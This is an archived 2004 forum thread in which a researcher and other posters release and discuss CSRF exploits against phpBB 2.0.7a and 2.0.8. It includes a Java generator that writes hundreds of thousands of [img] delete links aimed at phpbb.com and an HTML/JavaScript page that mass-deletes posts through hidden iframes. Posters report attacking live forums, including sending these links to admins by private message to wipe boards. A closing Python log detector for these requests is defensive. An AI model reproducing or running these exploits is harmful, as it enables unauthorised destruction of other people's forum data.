I have decided to release some proof of concept exploit examples. Those of you who know me are probably familiar with the fact that GulfTech keeps exploit code and the like private in almost all cases and only shares it with known security researchers, but I feel this is the only way to make misinformed people believers. It's unfortunate, but I will limit the examples to deleting posts and not performing admin actions, as my purpose is to not have anyone do any real harm to someone's forum.
If anyone wants to give their opinion we would love to hear it, as long as it is appropriate and not a flame or something unnecessary. We only want civilized discussion about this issue and a proposed fix.
Best Regards,
JeiAr GulfTech Security Research
Niekos
Mar 23 2004, 08:10 PM
QUOTE (JeiAr @ Mar 23 2004, 07:39 PM)
Since the phpBB team do not seem to think the issues I found as outlined here are serious issues.
JeiAr GulfTech Security Research
Why are they so stupid? You can't take these guys seriously. Thanks for all the info, man. You are doing a great job.
aapje
Mar 23 2004, 08:20 PM
Wow, they are really stupid. I tried it and it works fine. I guess you can also trick it to give a certain user admin rights.... or delete a whole forum...
JeiAr
Mar 23 2004, 08:22 PM
Thanks. To know I am helping someone makes it all worthwhile.
I don't think they are stupid, as they have always handled things well before. I am hoping it is just a misunderstanding. But then they resort to this?!?
QUOTE
I should add that I did not give permission for the original reporter to disclose my email conversations with him ... I could have pursued that if I'd wished. However I decided it may help explain the situation and thus let it go.
1) Giving them advance warning and waiting for a reply before going public.
2) Even honoring the guy's wishes, as seen here:
QUOTE
I don't mean this to sound like we don't want to do anything, it's just that there is no great need to in 2.0. So please, should you choose to release anything detailing "security problems" please be sure to emphasise the underlying issue as to why they are of very little concern.
---------------
I will release details of this email and try and show things from all points of view. I just want to help people, not frighten them or make them think phpBB is insecure. After all, we use phpBB for the GulfTech forums.
3) Fixing all of the issues except the Session ID auth issues myself when I work two jobs and rarely have any real time for myself.
JeiAr
Mar 23 2004, 08:27 PM
QUOTE (aapje @ Mar 23 2004, 08:20 PM)
wow, they are really stupid, i tried it and it works fine, i guess you can also trick to give a certain user admin rights.... or delete a whole forum...
I encourage people to explore the possibilities of these vulns, but I know for a fact that anything called via modcp.php doesn't work.
And so on... and they can say goodbye to all the posts if they didn't make a recent backup....
Guess you can use topics to delete too, haven't tried that.
JeiAr
Mar 23 2004, 08:30 PM
Yeah man, you can delete topics by deleting all the posts in that topic. It is a little tedious but works just as well as the topic delete function in the modcp. Here is an example.
Also, I tried the same for topic, t=..., but then I still get the confirmation, so guess that won't work.
JeiAr
Mar 23 2004, 08:37 PM
And you can be slick about it too. Make a post with a certain number of posts to be deleted, make an img to delete the post with the malicious requests in it, then make an image that logs out the user/mod/admin.
It's a wham bam thank you ma'am kinda post.
JeiAr
Mar 23 2004, 08:42 PM
And this issue is still present on the phpbb.com forums too. I just deleted one of my posts by simply visiting a URL.
aapje
Mar 23 2004, 08:48 PM
Maybe they learn if you...
make a big list of topics from 1 - 1000 in an image.
I'll try to make something to automate it.
JeiAr
Mar 24 2004, 09:50 AM
QUOTE (aapje @ Mar 23 2004, 08:48 PM)
Maybe they learn if you...
make a big list of topics from 1 - 1000 in an image.
I'll try to make something to automate it.
lol That would definitely wake me up.
migo
Mar 24 2004, 01:24 PM
What stupids they are!!!!! Yo man offered them help in their buggy scripts and they are too arrogant to listen.
For me, I tested something else in a board and guess what, I can promote a normal user account to an Admin account!!!!!!!!!!
Same ideas as JeiAr did!!! You can do anything with this serious risk.
Good work JeiAr, I'll go learn PHP scripting in depth, because PHP scripts are full of hunts because of developers' errors and no sanitization to properly filter people's inputs.
Nice work m8 once again.
Best Regards, migo
aapje
Mar 24 2004, 05:54 PM
QUOTE (JeiAr @ Mar 24 2004, 09:50 AM)
QUOTE (aapje @ Mar 23 2004, 08:48 PM)
Maybe they learn if you...
make a big list of topics from 1 - 1000 in an image.
I'll try to make something to automate it.
lol That would definitely wake me up.
Well, I made a javascript, just replace the 500000 with how many links you want...
It doesn't take long. Make a file in the same dir called list.txt, compile & run the code and you've got 500000 links in the text file... paste it in a post and voilà.
CODE
import java.io.*;
public class Main {
  public static void main(String[] args) {
    try { PrintWriter out = new PrintWriter(new FileWriter("list.txt"));
      // one BBCode [img] tag per line; the URL is the phpBB post-delete action with the confirm flag pre-set
      for (int i = 0; i < 500000; i++) { out.println("[img]http://www.phpbb.com/phpBB/posting.php?mode=delete&p=" + i + "&confirm=yes[/img]"); }
      out.close(); // flush and close the output file
    } catch (IOException e) { e.printStackTrace(); }
  }
}

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>phpBB 2.0.7a && Earlier Post Massacre</title>
<script language=JavaScript>
var s = 100; /* The P Num To Start With */
var e = 250; /* The P Num To End With */
var u = "http://localhost/forum"; /* The Path To phpBB Forum */
/* This Function Just Increments The Post Count, But If An Attacker Wanted To They Could Write An Array To Delete All Of Your Stickys, Announcements Or Any Other Posts They Didn't Like. And To Ensure Effectiveness All An Attacker Would Have To Do Is Send The Site Admin A PM With A Link To A Version Of This Script That Loads The Function Immediately And They Would Be Without Luck // JeiAr */
function DoTheDamnThang() {
  while (s < e) {
    document.write('<iframe width="0" height="0" src="' + u + '/posting.php?mode=delete&p=' + s + '&confirm=yes"></iframe>');
    s++;
  }
}
</script>
</head>
<body>
<center>
<p align="center"> This Is A Proof Of Concept Script To Show The Dangers Of The Vulnerabilities Discovered Recently By GulfTech Security Research Which The phpBB Team Initially Wrote Off As Not Being A Risk. This Script Could Also Be Loaded With Admin Commands To Execute, Hex Encoded SQL Queries To Run Via The Vulns In The ACP, And More. Do Not Mess With This Script If You Do Not Know What You Are Doing. </p>
<form method="post"> <input type="submit" value=" Do The Damn Thang! " onclick="DoTheDamnThang();"> </form>
</center>
</body>
</html>
aapje
Mar 24 2004, 07:24 PM
Hehe, should I post on phpbb with 1000000 img links?
JeiAr
Mar 24 2004, 07:45 PM
I do not think I am ever giving phpBB advance warning of holes EVER again. And I wouldn't blame other people for not doing so either.
QUOTE ("JeiAr")
I have seen numerous times Paul and other developers getting upset because people make vulns public without contacting them. They are 100% valid in this and I agree with them. But then I come here and see stuff like this.
QUOTE
Draegonis Moderator Team Member
Joined: 22 Apr 2002 Posts: 4124 Location: Timbucktwo Posted: Wed Mar 24, 2004 10:59 am Post subject:
I think the developers will implement a solution that they see fit, when they see fit. It's getting slightly tiring seeing 3rd parties thinking they know more about phpBB than those who wrote it. Locked, for now.
It makes me, and I am sure other security researchers, feel like we are wasting our time. The vulnerabilities I and other researchers have found are nothing but help to the phpBB community as a whole. Not only do I find some substantial holes, but I take time out of MY free time to try and help this "community" and get grief for it.
Why call it the "phpBB community" if someone who is not a developer having a say in it is a bad thing? I will bet money that in the future we will probably see more holes in phpBB being released unannounced. I seriously doubt I will ever try and help the phpBB community out again. This is unbelievable.
Just look at the shit going down on hxxp://www.phpbb.com/phpBB/viewforum.php?f=18
JeiAr
Mar 24 2004, 08:40 PM
You can also delete styles, smilies, word censors, ranks and probably more in the ACP via the malicious image method.
And also you can use the SQL injections in the admin panel too via an image tag.
Just hex encode the SQL to be executed, place it in an image tag and it's done. You can also have POST method stuff executed, but that will require getting an admin to visit a page you set up to submit the request when he visits it. It works but takes a little more social engineering.
aapje
Mar 24 2004, 08:43 PM
Haha, I'll post a topic which deletes 1100000 (that is all) the posts...
But I have to wait till there is an admin, otherwise the mods visit it first and then only the posts they can mod will be removed...
/edit: whee, I put 1100000 links in the field; when I press submit IE crashes...
Hehe, I'm PM-ing the admin right now, but copying 1000000 lines is not fast and IE and Mozilla cannot take it.
BTW, about phpnuke.... it uses a converted phpBB version... this should also work on that, and there maybe you can do even more in the phpnuke menu.
JeiAr
Mar 24 2004, 08:49 PM
QUOTE (aapje @ Mar 24 2004, 08:43 PM)
But I have to wait till there is an admin, otherwise the mods visit it first and then only the posts they can mod will be removed...
PM the admin. You can put these malicious "images" in PMs. That way ONLY a logged in admin will view it, and it will still execute the same.
JeiAr
Mar 24 2004, 08:51 PM
I think they are working on patches as we speak, and GulfTech has already released patches, so if anyone wants to have any "fun" with this issue they had better do it quick.
aapje
Mar 24 2004, 09:14 PM
//You read my modified post about nuke?
It seems I can't use more than 300000 lines, else IE crashes, so I am now PM-ing to delete the last 300000 messages, but it takes some time as it is like 25 MB...
Tonight I'll look at phpnuke.
/I'm gone for tonight, it is still sending the PM so I'll look at it later tonight.
Bye
JeiAr
Mar 25 2004, 10:46 AM
Ya know, I was thinking about something. Let's say a board has 10,000 posts and five admins. If you sent each admin 2,000 image links in a private message, you could wipe out the entire board. In a lot of cases they would be so confused by seeing 2,000 broken images in their PM that they would probably watch it long enough for most and maybe all 2,000 delete requests to be executed.
JeiAr
Mar 25 2004, 12:13 PM
Well, I think I got most things secured on the GulfTech Forums with the exception of the ACP issues, which is gonna require a good bit of work as there is NO session checking implemented there so it seems, and just transferring the modcp session auth over doesn't seem to work sooooo
Interesting. Gives new meaning to the expression a picture is worth a thousand words.
Also, I seem to have fixed all of the phpBB vulns on the GulfTech forums. I updated the files in the .rar files so you can try them if you like.
aapje
Mar 25 2004, 06:37 PM
Haha, I thought it would work on nuke too, thanks. I'll try to add me as an author on phpnuke.org; I'll give feedback.
JeiAr
Mar 25 2004, 07:00 PM
Well, phpBB 2.0.8 was released today, but my exploit code still works, as they only changed [img] tags to require a valid extension.
aapje
Mar 25 2004, 07:40 PM
I saw on nukecops.com that they already fixed it, but they only fixed it so that you can't get god mode, so you can still delete, activate modules etc etc etc. They just edited the Author & aid line so you have to confirm.
Niekos
Mar 25 2004, 07:50 PM
Hehe, I tested with this. Damn, this exploit works well. It's a very nice one. And it's a bit of fun.
JeiAr
Mar 25 2004, 08:12 PM
The iframe width=0 and height=0 seems to make it faster and less suspicious. You could also make that exploit more dangerous by putting it hidden in a legitimate looking web page or by hiding it in a frameset etc. But yeah, the phpBBpostMassacre still works even on phpBB 2.0.8.
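The requests this thread describes (a browser fetching posting.php?mode=delete&p=N&confirm=yes for a run of post ids because an [img] tag or a hidden iframe pointed at them) leave a recognisable trace in the web server's access log. The following is an added example, not code from the thread or from phpBB: it parses combined-format log lines and flags a client that issued several GET-based deletes from one referring page. The log format, hostnames and sample lines are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Combined log format: client ident user [time] "method target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

# Constructed sample (assumed host and ids): an admin reads a PM whose [img] tags point at delete
# URLs (five GETs, referer privmsg.php), then confirms one deletion via the form by POST (assumed
# to be how a patched board submits it), then an unrelated client views a topic.
R = "http://forum.example/phpBB"
SAMPLE_LOG = [
    f'10.0.0.5 - - [24/Mar/2004:20:40:0{i} +0000] "GET /phpBB/posting.php?mode=delete&p={100 + i}&confirm=yes HTTP/1.1" '
    f'200 512 "{R}/privmsg.php?folder=inbox&mode=read&p=7" "Mozilla/4.0"'
    for i in range(5)
] + [
    f'10.0.0.5 - - [24/Mar/2004:20:41:10 +0000] "POST /phpBB/posting.php HTTP/1.1" 302 0 "{R}/posting.php?mode=delete&p=321" "Mozilla/4.0"',
    f'10.0.0.9 - - [24/Mar/2004:20:41:12 +0000] "GET /phpBB/viewtopic.php?t=55 HTTP/1.1" 200 9000 "{R}/index.php" "Mozilla/4.0"',
]

def delete_via_get(method, target):
    """Return the post id when a deletion is triggered by a bare GET with confirm=yes (what an <img> or <iframe> can fire), else None."""
    if method != "GET":
        return None
    u = urlparse(target)
    q = parse_qs(u.query)
    if not u.path.endswith("/posting.php") or q.get("mode") != ["delete"] or q.get("confirm") != ["yes"]:
        return None
    return int(q["p"][0]) if q.get("p", [""])[0].isdigit() else None

def find_csrf_bursts(lines, threshold=3):
    """Group GET deletes by (client, referer): a referer other than posting.php means the request did not start from the delete form; consecutive ids mean a generated list."""
    groups = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        pid = delete_via_get(m["method"], m["target"])
        if pid is not None:
            groups[(m["ip"], m["referer"])].append(pid)
    alerts = []
    for (ip, referer), pids in groups.items():
        if len(pids) >= threshold:
            alerts.append({"ip": ip, "referer": referer, "count": len(pids),
                           "sequential": sorted(pids) == list(range(min(pids), max(pids) + 1))})
    return alerts
```

On the sample, the five deletes referred from the PM reader are reported as one sequential burst, while the form POST and the topic view are ignored.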